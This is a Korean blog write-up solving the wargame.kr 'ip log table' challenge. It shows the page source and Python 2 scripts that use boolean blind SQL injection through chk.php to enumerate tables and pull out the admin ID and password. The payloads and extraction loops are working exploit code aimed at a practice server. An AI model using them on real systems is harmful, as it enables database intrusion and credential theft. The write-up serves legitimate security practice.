반응형

ip log table

 

Blind SQLi challenge.

You can use 'Ascii' to 'Date'

.
 
 

페이지 소스

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<style>
 #mv_admin {cursor:hand; font-family:verdana; padding:10px; font-weight:bold;}
 td{text-align:center; height:30px;}
 .menu {background-color:#163; color:#fab;}
 .menu td{font-weight:bold;}
 .list td{text-align:center; cursor:hand;}
</style>
<script src="./jquery.min.js"></script>
<script> var f;
 function ov(){ this.style.color="#11f"; this.style.background="#ff0"; this.style.fontWeight="bold";}
 function ou(){ this.style.color="#000"; this.style.background="#fff"; this.style.fontWeight="normal";}
 function mv(){ f.idx.value=this.id; f.submit(); }
 function init(){
  a=document.getElementById("mv_admin");
  a.onmouseover=ov; a.onmouseout=ou; a.onclick=function(){window.location='admin.php';}
  f=document.getElementById("f"); iplist=$(".list");
  for(i=0;i<iplist.length;i++){
   iplist[i].onmouseover=ov; iplist[i].onmouseout=ou; iplist[i].onclick=mv;
  }
 }
</script>
<body onload="init();">
<center>
<h1>ACCESS IP LOG TABLE</h1>
<hr /><div id="mv_admin">[+] admin login [+]</div><hr />
<table border=1 width=550 align=center>
<tr class='menu'><td>idx</td><td>IP address</td></tr>
.
.
.
.
</table>
</center>
<form id="f" method="post" action="chk.php">
<input type="hidden" name="idx" value="blueh4g">
</form>
</body>
cs

 

소스를 보면, 행을 클릭했을 때 chk.php에 해당 id값을 post로 보내서 값을 받는다.

 

 

 

 

 

 

스크립트를 짜서 확인해보자

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import urllib
import urllib2
import re
 
url = "http://wargame.kr:8080/ip_log_table/chk.php"
 
opener = urllib2.build_opener(urllib2.HTTPHandler)
data = {"idx":"39749 and 1=0#"}
data = urllib.urlencode(data)
request = urllib2.Request(url, data)
request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
request.add_header('Cookie''PHPSESSID=cookie')
 
data = opener.open(request)
data = data.read()
 
print data
 
cs

 

39748 and 1=1    => TRUE => IP log time : 2020-01-01 17:43:20

39748 and 1=0    => FLASE => IP log time : 1970-01-01 09:00:00

 

 

이 것을 이용해서 blind sqli를 하면 된다.

 

 

 

 

 

 

 

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
import urllib
import urllib2
import sys
import time
 
key = ""
 
def chk(payload):
    url = "http://wargame.kr:8080/ip_log_table/chk.php"
 
    opener = urllib2.build_opener(urllib2.HTTPHandler)
    data = {"idx": payload}
    data = urllib.urlencode(data)
    request = urllib2.Request(url, data)
    request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    data = opener.open(request)
    data = data.read()
 
    print(payload)
    print data
    return data
 
 
'''
for i in range(70,100):
    payload = "39749 and (select count(*) from information_schema.tables)="+str(i)
    if not "1970-01-01 09:00:00" in chk(payload):
        key += str(i)
        print "[*] " +key
        break
    else:
        print "[-] Fail!"
    time.sleep(0.1)
'''
#result : 72
 
 
 
'''
for i in range(15):
    for j in range(33,127):
        payload = "39749 and ord(substring((select table_name from information_schema.tables limit 71,1),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not "1970-01-01 09:00:00" in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : ip_table
 
 
 
 
'''
for i in range(15):
    for j in range(33,127):
        payload = "39749 and ord(substring((select table_name from information_schema.tables limit 70,1),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not "1970-01-01 09:00:00" in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : admin_table
 
 
 
 
 
'''
for i in range(5):
    for j in range(33,127):
        payload = "39749 and ord(substring((select id from admin_table),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not "1970-01-01 09:00:00" in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : blue_admin
 
 
 
 
'''
for i in range(5):
    for j in range(33,127):
        payload = "39749 and ord(substring((select ps from admin_table),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not "1970-01-01 09:00:00" in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : 0h~myp4ss!
 
cs

 

칼럼개수가 너무 많아서 칼럼명을 찾기가 힘들다.

 

로그인 페이지에 있는 id와 ps를 그대로 칼럼명으로 썼더니 됐다.

 

 

 

 

얻은 id와 pw로 로그인을 하면 된다.

반응형

'WAR GAME > wargame.kr' 카테고리의 다른 글

Wargame.kr [lonely guys] 풀이  (0) 2020.01.06
Wargame.kr [keypad CrackMe] 풀이  (0) 2020.01.06
Wargame.kr [SimpleBoard] 풀이  (0) 2020.01.04
Wargame.kr [pyc decompile] 풀이  (0) 2020.01.04
Wargame.kr [web chatting] 풀이  (0) 2020.01.01

+ Recent posts